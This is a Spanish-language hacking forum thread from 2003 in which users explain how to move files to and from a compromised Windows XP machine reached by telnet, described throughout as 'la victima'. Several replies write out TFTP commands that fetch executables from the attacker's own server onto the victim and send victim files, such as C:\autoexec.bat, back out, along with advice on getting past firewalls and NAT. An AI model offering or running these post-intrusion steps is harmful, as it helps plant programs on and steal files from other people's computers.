elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  TFTP
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: TFTP  (Leído 28,283 veces)
4lpha

Desconectado Desconectado

Ver Perfil
TFTP
« en: 3 Octubre 2003, 06:50 »

Hola llevo muchisimo tiempo intentando usar tftp y no lo he logrado nunca. :-[´
Voy a poner un ejemplo de como lo hago yo, para que me corrijais.

Supongamos que he hecho un telnet a la ip 80.45.34.24 en el puerto 43, y estoy en un ordenador remoto.
Como podría mandarle un archivo mediante msdos? por tftp, pero tftp no me funciona. Miren, yo pondria esto para subirle un archivo llamado c:\ESTEESELARCHIVOQUEQUIEROMANDAR.exe:

tftp MiIP (Puesto que estoy en su ordenador, tendre que decir que el archivo esta en ese host, o sea en mi io no?) -i GET c:\AQILOQIEROMETER.exe c:\ESTEESELARCHIVOQUEQUIEROMANDAR.exe

Y cuando hago eso me dice: Tiempo de espera agotado. Si intento bajarme un archivo de mi mismo haciendome un telnet a mi mismo tambien me dice tiempo de espera agotado. Ayuda por favor. Si hay otra forma que no sea ni tftp ni ftp de subir archivos por msdos diganmela por favor. Ftp, creo que le tienes que instalar un programa a la victima o algo asi... Bueno me gustaría que me aclararan como usar tftp ( Ya se que es solo en XP) y como usar ftp y a ser posible otro medio. Saludos y gracias.

Rojodos
Colaborador

Ver Perfil WWW
Re:TFTP
« Respuesta #1 en: 3 Octubre 2003, 07:08 »

Tienes que tener un servidor TFTP instalado en tu ordenador, puerto 69.

Aqui tienes un servidor TFTP para windows:

http://usuarios.lycos/g1zm0nline/servertftpd32/

Espero que te sirva.

Salu2

4lpha

Ver Perfil
« Respuesta #2 en: 3 Octubre 2003, 07:11 »

Lo siento pero no me refiero a eso, me refiero alq te viene ya con XP, que tienen todos los XP, me gustaría saber como utilizar el tftp de XP correctamente. Saludos.

4lpha

Ver Perfil
« Respuesta #3 en: 3 Octubre 2003, 07:20 »

Ya se como funciona, vale, para subir arxivos a la gente tenia que abrir ese puerto y tenerlo habilitado para tftp. Eso es loq ace el programa q ma dado rojodos. Gracias y disculpa mi ignorancia.

4lpha

Ver Perfil
« Respuesta #4 en: 3 Octubre 2003, 07:59 »

Oye rojodos podrias poner un ejemplo de como estando haciendo telnet a por ejemplo esta ip: 62.101.171.130 puedo bajarme del host ( 62.101.173.134, por ejemplo, un arxivo?)
E intentado todo con GET pero no me deja me dice: acces violation

Rojodos
Colaborador

Ver Perfil WWW
« Respuesta #5 en: 3 Octubre 2003, 11:26 »

En tu ordenador tienes que tener funcionando el TFTP, que tenga acceso por Internet. Es decir, si tienes firewall, debes desactivarlo o permitir el acceso por TFTP.

Si el ordenador "hackeado" tiene un firewall, seguramente no podras acceder a traves de el a tu TFTP, no permitira dicha conexion de salida.

Asegurate de que el XP no tiene ningun firewall activo ni tampoco el propio que trae el XP....

A lo mejor tambien es problema de puertos de router, NAT, gateways...

Salu2

ToXiC

Biohazard

Ver Perfil
« Respuesta #6 en: 3 Octubre 2003, 11:32 »

rojodos el chaval te a preguntao k le digas como se ace....yo tb quiero saber como pork toi dentro d uno por l ie data y nada...
k no puedo bajar na...bueno solo dinos el comandillo y se acabo el tema ¡cerrao! un salu2 rojodos

Firma
Karmeshin

Ver Perfil
« Respuesta #7 en: 3 Octubre 2003, 13:45 »

Que yo sepa......
1º Has te tener el servidor TFTP rulando claro..... y puerto 69 UDP abierto

2º Si te conectas por telnet a la victima y kieres subirle un archivo:
tftp -i 80.45.69.69 get hola.exe

Esa IP debera ser la tuya, el hola.exe es el archivo q kieras subirle (se supone q estara en el directorio raiz q hayas configurado en el servidor).

3º Si lo que quieres es bajarte un archivo suyo a tu makina.... hay diversas maneras, le metes el radmin, o un servidor ftp...... pero si kieres hacerlo con TFTP lo tienes q hacer de la siguiente manera:
tftp -i 80.45.69.69 put adios.exe
eso lo pones en el directorio donde este el archivo adios.exe entonces, te subira el archivo a ti (recuerda que como estas en su pc, no tienes q bajarlo con GET sino subirlo a tu PC).

Saludos

IsAhT

Ver Perfil
« Respuesta #8 en: 3 Octubre 2003, 13:45 »

Para subir y bajar con el tftp necesitarás tener una consola de la victima, una vez conseguido, con un par de comandos bastará.

Con el tftp32 funcionando...

Para descargar un archivo de la victima:

tftp -i tu_ip PUT ruta

ruta es el archivo a descargar de la victima, como por ejemplo C:\autoexec.bat

Verás como acto seguido el tftp32 empieza a funcionar.

Para subirle un archivo a la victima:

tftp -i tu_ip GET nombre_archivo ruta

donde nombre archivo, será el archivo que está en la carpeta del servidor tftp32 o en la carpeta que hayas configurado en el tftp32 y ruta, el destino del archivo, como por ejemplo C:\windows\programa.exe

Como dijo rojodos, luego dependerá de la configuración del sistema de la victima, pero, si se tiene una shell, hacer un tftp debe ser lo de menos no?  ;)
« Última modificación: 3 Octubre 2003, 13:47 por IsAhT » En línea

El Conocimiento Humano Pertenece al Mundo (CELR)
4lpha

Ver Perfil
« Respuesta #9 en: 3 Octubre 2003, 23:06 »

Muchas gracias a todos, especialmente a rojodos por el programa de tftp, pero repito gracias a TODOS.

Ahora ya se como subir arxivos a XP por tftp.

Saludos y gracias de nuevo. :D

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
TFTP: problema detallado
Hacking Básico
agustinbv9 1 2,112 Último mensaje 21 Febrero 2011, 20:44
por agustinbv9
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines